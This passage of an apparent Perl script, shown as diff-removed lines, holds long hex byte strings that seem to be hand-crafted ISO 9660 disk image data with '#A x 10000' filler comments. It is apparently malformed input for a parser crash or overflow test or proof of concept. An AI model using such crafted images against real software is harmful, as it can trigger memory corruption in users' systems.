- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\xAA\x46\xBA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\xF4\x26\x29\x3A\x1C\x03\x30\x4B\x8A\xFA\x07\x0F\xB5\x0F\x63\xBC\x07\x0F\xBC". - "\xBC\x88\x0F\xB2\x45\x2B\x2D\xD3\xA2\x55\xC9\xD3\xCB\x75\x85\x85\x92\xC4\x3A\x74\x40\x25\x14\xD9\x2B\x43\x77\x96\x2B\x16\xF4\x71". - "\xC4\x80\x18\xEA\x55\xF9\xB3\xF2\xA4\x12\xCF\x6F\xCF\xA9\xCF\x62\xCF\xF3\xF4\xBF\x48\x83\xA4\x9B\x57\x72\x48\x78\x48\x6D\x48\x34". - "\x74\xE1\x0C\xB6\x01\x36\x00\x2E\x72\x4B\x2E\x8B\xEB\x31\x1F\xD0\x1F\x5E\xAD\x2F\x1F\xDA\xAD\x8A\x1F\xE1\x65\x77\x2D\xE3\xEE\x60". - "\x9B\xE6\x82\x49\xCA\xF7\xAB\xC6\x08\x7A\x73\x22\x07\x9E\x23\x5C\x4E\x64\x03\x23\xFC\x48\xF7\xB8\x0D\xF1\x43\xA6\xB6\x5A\xB7\x1E". - "\xDF\x13\xDF\x91\xDF\x6C\xDF\xE3\xE5\x8F\x78\x8D\x1C\xD3\x11\x5E\x78\x64\x78\x0B\x78\x48\x66\xB9\x80\x74\xD0\x16\x48\x0B\x50\x0A". - "\x1A\x2A\xDE\xE5\xE1\x1A\xD2\xC1\xD0\x9D\xEB\x1D\xF9\x1D\xDA\x95\xD8\xF9\xB3\xDB\xE9\xD3\xB5\xA4\xD2\xB7\xCE\xEE\xDB\x3A\xC5\x35". - "\x7B\xD5\x31\xAF\x0E\x5B\x50\x92\x92\xB7\x14\x78\x5E\x6C\xA4\xB0\x17\x18\x6F\xD9\x5D\x9C\x95\x94\x7B\x75\xDA\x97\xA1\xAD\x8D\x24". - "\xF0\xB9\x87\x44\x18\x2B\x7C\x0B\x06\xCD\xB5\x9A\x4A\x42\x4F\x16\xC3\x0B\x6F\x02\xD8\x4E\x5B\xEB\xE9\xE0\xCC\xBA\x64\x0B\x0C\x5D". - "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x18\x01\xFF\x43\x44\x30\x30\x31"; - #A x 10000 -my $img_data2 = "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD9\x85\xCF\x51\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\xF7\x10\xF5\xAA\x89\x78\x20\x20\xD5\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x92\x4C\xF3\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x08\xF4". - "\x55\xCA\x3C\x10\x10\xE4\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\xAF\x17\x83\xA2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\xD5\x93\xA6\x47\xE6\x17\x95\xC3\x00\x00\x00\x00\x00\x00\x00\x00\xBA\x00\x02\xC3\x1F\x71\xC6\x4C". - "\xA7\x2D\x51\x74\x97\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\xC2\x33\x31". 
- "\x13\x27\x3A\xD4\x00\x00\x00\x00\x00\x00\x00\x00\x4F\x00\xD6\x16\x76\xB5\x60\xE4\xA6\x22\xA6\x34\x8F\x12\x00\xFF\xFF\xFF\xFF\xFF". - "\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x19\x01\x01\x00\x17\x00\x00\x00\x01\x00\x00\x00\x02\x00\x18\x00\x00\x00\x01\x00\x41\x31\x02\x00". - "\x19\x00\x00\x00\x01\x00\x41\x32\x02\x00\x1A\x00\x00\x00\x01\x00\x41\x33\x02\x00\x1B\x00\x00\x00\x01\x00\x41\x34"; - #A x 10000 -my $img_data3 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - 